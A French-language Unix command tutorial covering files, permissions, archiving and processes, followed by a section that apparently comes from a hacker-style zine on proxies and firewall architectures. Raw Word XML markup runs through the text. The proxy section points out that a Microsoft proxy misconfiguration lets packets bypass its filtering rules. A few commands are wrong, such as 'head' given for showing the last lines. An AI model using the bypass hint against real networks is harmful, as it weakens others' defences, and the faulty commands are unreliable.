répertoire fils : est un répertoire de niveau immédiatement inférieur au répertoire courant. C'est un sous-répertoire d'un répertoire parent.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Struture arborescente : Le premier niveau de l'arborescence est nommé la racine (root). On le désigne par le slash (/). C'est le répertoire père de tous les répertoires.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Le caractère "." désigne le répertoire courant.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Le caractère ".." désigne le répertoire pèr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Le caractère "~" désigne le répertoire d'accueil (home directory).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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment créér un répertoire ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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mkdir nom_du_répertoir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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment afficher le contenu d'un répertoire ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Syntaxe : ls [-alFgd]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ls -a : affichage des fichiers silencieux (fichiers qui commencent par un ".", exemple .profil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ls -l : affichage long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ls -F : type de fichier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ls -g : groupe de l'utilisateur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ls -d : répertoir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Exemples :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ls : pour avoir une liste simple des fichiers du répertoire courant.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ls -al : pour avoir une liste avec toutes les informations sur les fichiers (le nom du propriétaire, le nom du groupe, les droits d'accès sur le fichier, le nombre d'octets, la date de création .etc.)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ls -aF : les fichiers exécutables sont marqués acec une astérique (*), les répertoires avec un slash (/).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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment se déplacer dans l'arborescence ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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cd nom_du_sous_répertoire : pour aller au sous répertoire spécifié.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cd /usr/local/DFREML/DF93/MUW : pour aller au sous répertoire spécifié.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cd .. : pour remonter d'un niveau.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cd ../.. : pour remonter de deux niveaux.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cd ../PREP : pour remonter d'un niveau et redescendre sous PREP.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cd : pour revenir au home-directory (variable $HOME, c'est à dire /home/mcbatut pour l'utilisateur mcbatut).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cd ~ : pour revenir au répertoire d'accueil c'est à dire le home-directory.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Remarque : L'arborescence ressemble à celle que vous avez l'habitude d'utiliser sous MS-DOS, attention au sens des délimiteurs (sous MS-DOS, c'est l'anti-slash (), sous Unix, c'est le slash (/)).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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Sur quel répertoire est-on positionné ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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pwd : Print Working Directory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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment changer les droits d'accès d'un fichier ou d'un répertoire ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Syntaxe : chmod qui opération permission nom_du_fichier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qui :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u : pour modifier les permissions de l'utilisateur (user)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g : pour modifier les permissions du groupe (group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o : pour modifier les permissions des autres (other)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 : pour modifier les permissions de tous (all)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opération :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 : pour ajouter une permission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 : pour enlever une permission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permission :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r : permission de lire (read)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w : permission d'écrire (writ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x : permission d'exécuter (execut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Exemples :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chmod a+r nom_du_fichier : donne les droits en lecture (read) à tous les utilisateurs (all) pour le fichier indiqué.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chmod g-w nom_fichier : pour ne pas autoriser les utilisateurs du groupe à écrire (write) sur le fichier indiqué.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chmod -R o-x nom_repertoire : l'option "-R" indique que le fichier indiqué est un répertoir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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment changer de propriétaire ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Syntaxe : chown [-R] nom_user nom_du_fichier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chown mcbatut mon_fichier :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chown -R mcbatut essai :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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment rechercher un fichier dans l'arborescence ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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find . -name kinou -print : permet de rechercher à partir du répertoire courant les fichiers de nom kinou et de les afficher.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kinou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canards/kinou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find . -name kinou -exec ls -il : permet de rechercher à partir du répertoire courant les fichiers de nom kinou et de les afficher sous le format long (l).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2064 -rwx-r-x-r-x 1 mcbatut etude 10716 Fv 21 15:43 ./canards/kinou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find . -name kinou -type d -print : permet de rechercher les fichiers de nom kinou et mais seulement ceux qui sont de type directory (répertoir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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment ne visualiser que les premières lignes d'un fichier ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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head nom_du fichier : visualise les 10 premières lignes du fichier nom_du_fichier.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head -20 nom_du fichier : visualise les 20 premières lignes du fichier nom_du_fichier.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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment ne visualiser que les dernières lignes d'un fichier ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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tail -l nom_du fichier : visualise les 10 dernières lignes du fichier nom_du_fichier.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head -l -n 20 nom_du fichier : visualise les 20 dernières lignes du fichier nom_du_fichier.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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment copier tout un répertoire ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Syntaxe : cp -r nom_du_repertoire_source nom_du_repertoire_destination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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment déplacer tout un répertoire ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Syntaxe : mv nom_du_repertoire_source nom_du_repertoire_destination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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment détruire un répertoire ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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rmdir nom_du_répertoire : permet de détruire le répertoire spécifie s'il est vid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rm -r nom_du_répertoire : permet de détruire les fichiers du répertoire et le répertoire lui-mêm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rm -ir nom_du_répertoire : permet de détruire les fichiers du répertoire et le répertoire lui-même. en demandant confirmation (option -i).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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment archiver tout un répertoire ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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tar -cvf palmi.tar palmi :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c : création (creat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v : pour voir ce qu'il se passe (verbos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f : fichier (file) dans lequel on stocke l'archivage (palmi.tar). Il est recommandé de mettre le suffixe tar pour savoir qu'il faut le désarchiver avec la commande tar.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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment désarchiver tout un répertoire ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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tar -xvf palmi.tar :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x : extraire (extract)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v : pour voir ce qu'il se passe (verbos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f : fichier (file) qu'on veut désarchiver.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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment compresser un fichier ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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compress palmi.tar : compresse le fichier palmi.tar et le stocke dans le fichier palmi.tar.Z (existe sur tous les unix).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gzip palmi.tar : compresse le fichier palmi.tar et le stocke dans le fichier palmi.tar.gz (plus efficace que le compress).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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment décompresser un fichier ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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ttention dépend de l'utilitaire avec lequel le fichier a été compressé.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uncompress palmi.tar.Z : décompresse le fichier palmi.tar.Z si le fichier a été compressé avec compress (suffixe .Z).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gzip -d palmi.tar.gz ou gunzip palmi.tar.gz: décompresse le fichier palmi.tar.gz si le fichier a été compressé avec gzip (suffixe .gz).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Les commandes d'archivage ("tar"), de compression ("compress" ou "gzip") et de décompression ("uncompress ou "gzip -d") sont recommandées si vous avez des fichiers volumineux à transférer ("ftp").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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Y a-t-il de la place sur le ou les disques ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Commande df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Sur "dga2" et "dga3", tous les utilisateurs de la SAGA sont sous "/utou".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Sur les autres serveurs, les utilisateurs sont sous "/hom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Pour utiliser au mieux votre espace disque, n'oubliez pas de faire le ménage régulièrement, et utilisez les outils de compression et de décompression vus ci-dessus.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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment changer de groupe ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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chgrp nom_groupe nom_fichier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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment changer de propriétaire et de groupe ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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chown nom_proprietaire.nom_groupe nom_fichier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Les redirections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prog &lt;fichier_entree : permet de lancer le programme exécutable "prog" et de rediriger l'entreé standard sur un fichier; donc de lire les donneés dans un fichier.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prog &gt;fichier_sortie : permet de lancer le programme exécutable "prog" et de rediriger la sortie standard sur un fichier; donc d'écrire le résultat dans le fichier spécifié. Si ce dernier existe, il est écrasé.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prog &gt;&gt;fichier_sortie : même chose que précédemment mais dans ce cas si le fichier existe, il n'est pas écrasé. Les écritures se font en fin de fichier.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prog 2&gt;fichier_erreurs : permet de rediriger les erreurs dans le fichiers "fichier_erreurs".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prog &lt;fichier_entree &gt;fichier_sortie &gt;fichier_erreurs : permet de combiner les 3 redirections.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Généralités sur les processus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Unix créé un processus pour chaque tâche à réaliser. Un processus est un programme qui peut s'exécuter en mémoire de manière indépendante. Tout processus est issu d'un processus père. L'orsqu'un processus fils se termine, il renvoie au père un code de sorti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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment avoir la liste des processus ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Syntaxe : ps [-aef]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 donne des informations sur tous les processus actifs, sauf ceux qui n'ont pas de sortie écran.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e donne des informations sur tous les processus actifs.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f affichage long.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Exemples :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ps -aef : permet d'avoir la liste de tous les processus.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ps -aef |more : permet d'avoir la liste de tous les processus page par pag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ps -u mcbatut : permet d'avoir la liste des processus de l'utilisateur "mcbatut".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ps -aef |grep mcbatut : permet d'avoir la liste des processus de l'utilisateur "mcbatut".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ps -aef |grep ora : permet d'avoir la liste des processus oracl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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment tuer un processus ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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kill -9 numero_du_processus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Vous ne pouvez tuer que les processus qui vous appartiennent.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ttention, quand on tue un processus, tous les processus fils de ce processus sont tués. Exemple : si vous êtes en environnement X et que vous tuez la fenêtre de login, toutes les autres vont se fermer, c'est comme si vous vous déconnectiez (sauf qu'il risque d'y avoir des processus en suspens, processus marqués "defunct" quand on fait un "ps").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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment lancer un processus en arrière plan ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Il faut ajouter le caractère &amp; à la fin de la command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xterm &amp; : pour ouvrir une nouvelle fenêtr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xclock &amp; : pour lancer l'horlog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xcalc &amp; : pour lancer la calculett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nohup prog &amp; : permet de lancer un programme en arrière plan et de ne pas le tuer lorsque l'utilisateur se déconnecte. Ajouter dans ce cas là les redirections : nohup prog &gt;fichier_sortie 2&gt;fichier_erreurs &amp;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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment lancer un travail en différé ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Commande at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t -f fichier_reference -m 1830 : permet de lancer les commandes contenues dans le fichier "fichier_reference" à partir de 18H30 et d'indiquer par courrier "-m" (pour mail) la fin de l'exécution différée des commandes.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t -l : permet de lister les demandes d'exécution en différé.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t -r mcbatut.710779460.b : permet d'annuler la demande de d'exécution en différée référencée par le numéro indiqué.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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment lancer un travail en batch ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Commande batch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batch -f fichier_reference : permet de lancer les commandes contenues dans le fichier "fichier_referenc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t -l : permet de lister les demandes de batch.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t -r mcbatut.710779460.b : permet d'annuler la demande de batch référencée par le numéro indiqué.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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment lancer un batch sur dga2 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Sur "dga2", utiliser le gestionnaire de travaux bath "xloadl"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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment changer la priorité des processus ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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nice -n 13 prog : permet de lancer le programme exécutable "prog" avec la priorité 13.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renice -n 19 numero_du_process : permet de modifier la priorité du processus numéro "numero_du_process".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Les numéros de processus vont de 1 à 19 pour les utilisateurs (19 étant la priorité la plus faibl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Seul le super-utilisateur (root) peut utiliser une priorité négative et donc mettre les priorités les plus fortes.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L'aide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Pour avoir l'aide en ligne : man nom_de_la_commande exemple : man ls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Pour avoir l'aide sous l'environnement X_Window : "Infoexplorer" (présent sur "bazacle" et "dga2"). Pour le lancer taper : info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Quitter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logout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exit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Ctrl- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="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___________________________________</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3.9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les proxys et les firewalls, par Clad Strif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roxys:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le serveur proxy est un moyen comme un autre de connecter tout un réseau à travers une seule adresse IP. De plus un proxy est un moyen de sécurité assez puissant, vu que un serveur proxy peut autoriser une connexion internet vers "l'extérieur" pour le réseau mais peut interdire une connexion "extérieure" via le proxy vers le réseau. Un proxy mets aussi en place ce que l'on appelle une mise en cache des pages visitées, ce qui revient à dire qu'en retournant sur la page visitée, la mise en cache s'éxécute et vous voyez la page de la mise en cache. Ainsi il n'y a aucun temps de chargement. Le problème reste le même avec ce système: quand on veut voir la nouvelle version d'un page web, la mise en cache s'éxécutera et on verra l'ancienne. Il ne restera alors qu'à reload la page. Ainsi en implémentant d'autres produits pour la sécurité le proxy peut alors devenir un "firewall" à part entière. Point de vue connexion on comprend bien que le proxy a 2 ou plus de cartes réseaux pour pouvoir joindre le réseau extérieur et le réseau intérieur. Tout ceci pour se sécuriser contre les intrusions LAN. Sur certains proxys la seule IP visible sera ladresse IP du proxy lorsque le routage d'IP ne sera pas activé (vous pouvez voir ça en cliquant sur Démarrer/Exécuter/winipcfg/plus d'infos/ en haut il y a coché ou non routage d'IP activé, avec d'autres infos comme WINS proxy activé etc...). De plus nombreux proxys filtrent les packets (tels des firewalls), de sorte que la machine recevant les trames reçoive aussi une demande de bloquage ou d'autorisation lors de la réception du packet de données.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Un réseau interne est composé de multitudes de paires d'addresses IP: le Local Address Table - LAT. Le LAT est créé lors de l'installation du proxy pour définir les adresses internes. Prenons l'exemple concret de Microsoft: les serveurs proxy Microsoft utilisent la table de routage de windows NT pour autocréer le LAT, ce qui a pour effet de produire des erreurs. Information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interessante quand on sait que les paquets IP routés via ce chemin ne seront pas soumis aux regles. Ce qui inclut donc que les sous réseaux peuvent être dans le même cas. Par ailleurs nous pouvons supposer qu'en éditant le fichier msplat.txt qui est dans le dossier \Mspclnt de la machine proxy, nous pourrons voir le LAT. Seuls les utilisateurs du réseau interne peuvent y établir une connection et ainsi modifier la LAT.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Firewalls (made with help): Un firewall permet de renforcer le dispositif de sécurité mis en place sur un système à l'aide de plusieurs options séléctionnées par le niveau de sécurité selon la sensibilitée des données à protéger. Donc en réalité un firewall fait une sélection des données à recevoir. Cette sélection s'appelle filtrage. Le filtrage permet de déterminer l'acceptation de réceptions des trames dont le système utilisant le firewall devrait bénéficier. Il est conçu aussi pour empêcher l'intrusion d'une machine "ennemie" sur la machine "amie". Donc les options du firewall permettent au firewall de savoir ce qu'il va devoir filtrer. Ces options sont les Règles de Contrôle d'Accès (Acces Control Policy). Les firewalls de type réseau operent au niveau des paquets IP. Ils possedent en general deux interfaces (cartes réseau), une vers le réseau "ami" et l'autre vers le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réseau "ennemi". Le filtrage s'établit par examination et comparaison des paquets sur la tabledes Regles de Controle d'Acces. Ces firewalls sont capables de filtrer un trafic composé de n'importe quelle combinaison d'IP source et destination, type de paquet ou assignement de port TCP. Normalement spécialisés comme des routeurs d'IP, ils sont rapides et efficaces et transparents a toute opération réseau. Les firewalls d'aujourd'hui deviennent de plus en plus complexes. Ils peuvent conserver des informations sur les statistiques des paquets qui les traversent, y compris certaines données. Les exemples qui sont decrits plus bas sont ceux de :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Bastion Host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creened Host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creened Subnet </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720" w:hanging="3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Bastion Host Firewall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Communément rencontré sur les réseaux, le terme bastion réfere a la structure d'un vieux chateau, principalement pour la notion du pont-levis. C'est un ordinateur avec au moins deux interfaces (cartes réseau), une vers le réseau "ami" et l'autre vers le réseau "ennemi". Quand le premier acces réseau est autorisé depuis l'interieur vers la partie "ennemi" par le Bastion Host, tous les autres acces le sont également. Physiquement, les Bastion Host se place entre l'intérieur et l'exterieur du réseau, sans autre intervenant. Ils sont normalement utilisés comme une partie d'un autre firewall -plus grand et plus sophistiqué-.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es désavantages : Une fois qu'un intrus a les droits d'acces, il a un acces direct a la totalité du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réseau. Ce type de protection n'est pas assez sophistiqué pour les applications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réseau. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720" w:hanging="3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creened Host Firewall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éjà plus poussé au niveau technique, ce firewall utilise un routeur intégré avec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u moins deux interfaces (cartes réseau), une vers le réseau "ami" et l'autre vers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un Bastion Host. Le routeur intégré sert d'intermédiaire avec Bastion Host. Ainsi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es paquets sont routés apres avoir été filtrés selon des regles prédéfinies. Ces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regles peuvent décider quelles adresses IP sont autorisées ou refusées. Tous les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utres examens de paquets sont effectués par les "Bastion Host". Le routeur fait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baisser le traffic vers le bastion host et allege le travail en diminuant le nombre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algorithmes a éxécuter.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Physiquement, le Screened Host est un routeur avec une connexion sur l'exterieur et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une connexion vers un "Bastion Host". Le Bastion Host a une connexion avec le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routeur et une connexion sur le réseau interne.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es désavantages : S'il est seul, il peut devenir un goulot d'étranglement. Si le systeme hote tombe,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a passerelle entiere tombe avec. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720" w:hanging="3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creened Subnet Firewalls </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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vec plusieurs autres routeurs et Bastion Hosts, on forme une batterie de pont-levis a un réseau. Physiquement plus difficile a représenter, mais un résultat plus sécurisé dans un environnemt robuste. Normalement il se constitue comme suit : Un routeur avec une connexion sur le reseau exterieur et une autre sur un Bastion Host. Le bastion Host a une connexion sur le routeur le plus proche de la sortie et une connexion sur un autre bastion host, avec une connexion réseau adressable au milieu. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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e bastion host le plus proche de l'intérieur a une connexion vers le bastion host le plus proche de la sortie et une autre connexion sur un routeur interne. Le routeur interne a une connexion vers le Bastion host le plus proche de l'entrée du réseau interne. Le résultat de cette configuration tortueuse est que les composants de sécurité ne bogguent jamais, et toutes les adresses ip internes sont </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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invisibles de l'exterieur, évitant ainsi toute possibilité de "mapping". Les désavantages : </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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e prix (deux a trois fois plus cher). L'implémentation doit etre faite par un professionnel de la sécurité. A déconseiller au newbies. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Du point de vue client, un serveur proxy est une application qui se substitue aux ressources réseau en se faisant passer pour l'émetteur/récepteur. Du point de vue réseau, le serveur proxy accede aux ressources en se faisant passer pour le client. Les firewall a niveau applicatif peuvent aussi controler un traffic entre deux réseaux. Ils sont aussi capable de proposer des fonctions comme les mesures d'audit et de logging avancé. Les statistiques sont plus détaillées mais généralement ne le font pas si bien que ca. C'est avant tout un programme qui s'éxécute sur une machine qui est attaquable et plantable; le cas échéant, vous crashez le firewall avec. A utiliser en complément avec des firewalls network level.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______________________</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3.10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
